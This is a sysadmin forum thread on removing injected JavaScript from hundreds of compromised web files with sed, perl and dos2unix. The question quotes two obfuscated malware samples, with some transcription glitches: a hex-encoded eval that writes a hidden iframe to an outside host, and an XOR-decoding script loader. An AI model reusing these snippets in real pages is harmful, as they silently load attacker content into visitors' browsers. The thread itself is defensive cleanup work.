Remove java code from multiple files


We have a client who has had an FTP injection attack on their account. Over 600 files have this code added to the files:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

::sorry, may make you scroll to the right::

I am looking for a sed (or other command) that will find this string and remove it..

Some code I have tried:

grep -rl 646f63756d6 * | xargs sed -i '/<script/,/<\/script>/d'

That one is real close.. But, it removes everything after <script... So, if there is any data after the </script>, it gets removed too.. So, I think it just needs some tweaking...

Thanks for any help!


---------- Post updated at 12:50 AM ---------- Previous update was at 12:00 AM ----------


I see that my first code won't work, that is meant for deleting a complete line, but sometimes there is valid code at the beginning of the line (like </html>).

So, I think I need the properly formatted find/replace command (s///). I can't seem to come up with the proper find piece.



you want to remove only the contents within <script> and </script> right?



The entire statement needs to be removed, including the <script> and </script>.



Try this one,,

sed 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#' sample.txt

here sample.txt is the input file..


1 Like


I think that did the trick! I used:

grep -rl 646f63756d6 * | sed 's/ /\ /g' | xargs sed -i 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#'

to replace a number of files in a test directory.

Thanks much!



Had another situation occur that was about the same as this one, except the javascript is across multiple lines (vs all on the same line like my first issue). I did get those files cleaned up, thanks again rangarasan.

This one goes more like this:

function vdch () {^M

each line ends with the ^M character, so that will probably affect the command a bit.

Is there a sed variant of the one presented that would support multiple lines of this nature?


i dont thing your requirment full fill by sed. I go with awk or perl.
Which language do you prefer?

First, if your file is in Unix/Linux, then remove those "^M" characters by feeding it to the "dos2unix" command.

dos2unix your_file
od -bc your_file

The "od -bc" command prints an octal dump of the file contents; ensure that you do **not** see any "\r" characters after the dos2unix command has been run on your file.

Thereafter, for removing multi-line <script> tags plus their content, you could do something like so:

$ cat -n f36
     1  this is line 1
     2  this is line 2
     3  <script> the script tags
     4  and their contents span
     5  multiple lines
     6  in this case
     7  </script>
     8  this is line 8
     9  <script> begin and close tags on same line </script>
    10  this is line 10
    11  and this is <script> begin and close tags somewhere
    12  within the line, i.e. not at the
    13  beginning and end of
    14  the line </script> line 14
    15  final line number 15
$ perl -lne 'if (/^(.*?)<script>.*$/) {
               print $1;
               $in = 1;
             if ($in and /^.*?<\/script>(.*?)$/) {
               print $1;
               $in = 0;
             } elsif (not $in) {print}
            ' f36
this is line 1
this is line 2

this is line 8

this is line 10
and this is
 line 14
final line number 15

If you could post a sample of your data file, then that should be helpful.


1 Like


Thanks much for the replies!

Here is the sample of the data in hundreds of files, this is the end of one of the files

function vdch() {^M
        if(document.all.length > 3) {^M
                var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029');^M
                var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }^M
                var dch = document.createElement("script");^M
       = "dchid";^M
                dch.src = dchid;^M
        } else {^M
} setTimeout("vdch()",500);^M

Sometimes the <script> piece starts on its own line, but more often, it starts on the last line of the file.

Will have to get that ^M stripped out, hopefully there is an easy method to do this on a lot of files at once?

Thanks again for any help!


If all your target files have the extension ".java" and are in only one directory "my_dir", then change to that directory and run the dos2unix on all those files, like so -

cd my_dir
dos2unix *.java

If your target files are spread out in multiple directories and subdirectories thereof, then use the "find-and-exec" technique.
Change to the highest directory, i.e. a directory from where you could traverse the directory-tree and process all such java files, and then -

cd highest_dir
find . -name "*.java" -exec dos2unix {} \;

Alternatively, if you do not want to cd to any directory, and work from your current location, then you will have to specify the entire path, like so -

# fix "^M" in all java files in "/my/path/to/java/files" directory
dos2unix /my/path/to/java/files/*.java
# fix "^M" in all java files in the entire tree below "/my/highest/dir" directory
find /my/highest/dir -name "*.java" -exec dos2unix {} \;


1 Like